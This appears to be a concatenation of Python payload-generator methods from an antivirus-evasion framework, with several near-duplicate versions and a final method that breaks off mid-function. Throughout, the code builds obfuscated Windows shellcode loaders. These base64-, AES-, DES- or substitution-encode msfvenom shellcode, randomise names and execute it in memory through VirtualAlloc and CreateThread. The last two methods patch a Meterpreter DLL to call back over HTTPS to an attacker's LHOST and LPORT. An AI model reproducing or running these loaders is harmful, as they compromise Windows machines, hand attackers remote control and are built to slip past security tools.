def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandT = randomizer.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
DecodedShellcode = randomizer.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
if self.required_options["inject_method"][0].lower() == "virtual":
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandT = randomizer.randomString()
PayloadCode = 'import ctypes\n'
PayloadCode += 'import base64\n'
PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
else:
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
DecodedShellcode = randomizer.randomString()
# Base64 Encode Shellcode
EncodedShellcode = base64.b64encode(Shellcode)
PayloadCode = 'from ctypes import *\n'
PayloadCode += 'import base64\n'
PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
# Create Payload code
PayloadCode = "import ctypes\n"
PayloadCode += ShellcodeVariableName + " = bytearray('" + Shellcode + "')\n"
PayloadCode += (
RandPtr
+ " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
+ ShellcodeVariableName
+ ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
)
PayloadCode += (
RandBuf
+ " = (ctypes.c_char * len("
+ ShellcodeVariableName
+ ")).from_buffer("
+ ShellcodeVariableName
+ ")\n"
)
PayloadCode += (
"ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
+ RandPtr
+ "),"
+ RandBuf
+ ",ctypes.c_int(len("
+ ShellcodeVariableName
+ ")))\n"
)
PayloadCode += (
RandHt
+ " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
+ RandPtr
+ "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
)
PayloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Generate Random AES Key
secret = randomizer.randomKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
SubbedShellcodeVariableName = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodedLetter = randomizer.randomString()
RandCorrectLetter = randomizer.randomString()
RandSubScheme = randomizer.randomString()
# Letter Substitution Variables
EncodeWithThis = "c"
DecodeWithThis = "t"
# Create Letter Substitution Scheme
SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
# Create Payload File
PayloadCode = 'import ctypes\n'
PayloadCode += 'from string import maketrans\n'
PayloadCode += RandDecodedLetter + ' = "t"\n'
PayloadCode += RandCorrectLetter + ' = "c"\n'
PayloadCode += RandSubScheme + ' = maketrans(' + RandDecodedLetter + ', ' + RandCorrectLetter + ')\n'
PayloadCode += SubbedShellcodeVariableName + ' = \"' + Shellcode.translate(
SubScheme) + '\"\n'
PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
SubbedShellcodeVariableName = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodedLetter = randomizer.randomString()
RandCorrectLetter = randomizer.randomString()
RandSubScheme = randomizer.randomString()
# Letter Substitution Variables
EncodeWithThis = "c"
DecodeWithThis = "t"
# Create Letter Substitution Scheme
SubScheme = string.maketrans(EncodeWithThis, DecodeWithThis)
# Escaping Shellcode
Shellcode = Shellcode.encode("string_escape")
# Create Payload File
PayloadCode = 'import ctypes\n'
PayloadCode += 'from string import maketrans\n'
PayloadCode += RandDecodedLetter + ' = "t"\n'
PayloadCode += RandCorrectLetter + ' = "c"\n'
PayloadCode += RandSubScheme + ' = maketrans('+ RandDecodedLetter +', '+ RandCorrectLetter + ')\n'
PayloadCode += SubbedShellcodeVariableName + ' = \"'+ Shellcode.translate(SubScheme) +'\"\n'
PayloadCode += SubbedShellcodeVariableName + ' = ' + SubbedShellcodeVariableName + '.translate(' + RandSubScheme + ')\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + SubbedShellcodeVariableName + '.decode(\"string_escape\"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
RandDecodeAES = randomizer.randomString()
RandCipherObject = randomizer.randomString()
RandDecodedShellcode = randomizer.randomString()
RandShellCode = randomizer.randomString()
RandPadding = randomizer.randomString()
# Generate Random AES Key
secret = randomizer.randomKey()
# Create Cipher Object with Generated Secret Key
cipher = AES.new(secret)
EncodedShellcode = encryption.EncodeAES(cipher, Shellcode)
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += 'from Crypto.Cipher import AES\n'
PayloadCode += 'import base64\n'
PayloadCode += 'import os\n'
PayloadCode += RandPadding + ' = \'{\'\n'
PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
self.shellcode = shellcode.Shellcode()
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandDESKey = randomizer.randomString()
RandDESPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = randomizer.randomKey(8)
DESKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
desmain = DES.new(DESKey, DES.MODE_CFB, iv)
EncShellCode = desmain.encrypt(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
ShellcodeVariableName = randomizer.randomString()
RandIV = randomizer.randomString()
RandDESKey = randomizer.randomString()
RandDESPayload = randomizer.randomString()
RandEncShellCodePayload = randomizer.randomString()
# Set IV Value and DES Key
iv = randomizer.randomKey(8)
DESKey = randomizer.randomKey(8)
# Create DES Object and encrypt our payload
desmain = DES.new(DESKey, DES.MODE_CFB, iv)
EncShellCode = desmain.encrypt(Shellcode)
# Create Payload File
PayloadCode = 'from Crypto.Cipher import DES\n'
PayloadCode += 'import ctypes\n'
PayloadCode += RandIV + ' = \'' + iv + '\'\n'
PayloadCode += RandDESKey + ' = \'' + DESKey + '\'\n'
PayloadCode += RandDESPayload + ' = DES.new(' + RandDESKey + ', DES.MODE_CFB, ' + RandIV + ')\n'
PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode(
"string_escape") + '\'\n'
PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDESPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
RandShellcode = randomizer.randomString()
RandReverseShell = randomizer.randomString()
RandMemoryShell = randomizer.randomString()
PayloadCode = 'from ctypes import *\n'
PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
PayloadCode += RandShellcode + '()'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
# Generate Shellcode Using msfvenom
Shellcode = self.shellcode.generate()
# Generate Random Variable Names
ShellcodeVariableName = randomizer.randomString()
RandPtr = randomizer.randomString()
RandBuf = randomizer.randomString()
RandHt = randomizer.randomString()
# Create Payload code
PayloadCode = 'import ctypes\n'
PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
if self.required_options["use_pyherion"][0].lower() == "y":
PayloadCode = crypters.pyherion(PayloadCode)
return PayloadCode
def generate(self):
metsrvPath = veil.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x37"
headerPatch += "\x15\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,
userAgentString)
# turn on SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
) + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,
expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(
struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,
communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( " + randb64stringName + " )\n"
payloadCode += "\treturn zlib.decompress( " + randVarName + " , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
payloadCode += randFuncName + "()\n"
if self.required_options["use_encrypter"][0].lower() == "y":
payloadCode = crypters.pyherion(payloadCode)
return payloadCode
def generate(self):
if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
else:
metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"
f = open(metsrvPath, 'rb')
meterpreterDll = f.read()
f.close()
# lambda function used for patching the metsvc.dll
dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
# patch the metsrv.dll header
headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\xb0"
headerPatch += "\x0e\x00\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
# patch in the default user agent string
userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
# turn off SSL
sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
# replace the URL/port of the handler
urlIndex = meterpreterDll.index("https://" + ("X" * 256))
urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + randomizer.randomString(16) + "/\x00"
meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
# replace the expiration timeout with the default value of 300
expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
expirationTimeout = struct.pack('<I', 604800)
meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
# replace the communication timeout with the default value of 300
communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
communicationTimeout = struct.pack('<I', 300)
meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
# compress/base64 encode the dll
compressedDll = helpers.deflate(meterpreterDll)
# actually build out the payload
payloadCode = ""
# traditional void pointer injection
if self.required_options["inject_method"][0].lower() == "void":
# doing void * cast
payloadCode += "from ctypes import *\nimport base64,zlib\n"
randInflateFuncName = randomizer.randomString()
randb64stringName = randomizer.randomString()
randVarName = randomizer.randomString()
# deflate function
payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
randVarName = randomizer.randomString()
randFuncName = randomizer.randomString()
payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
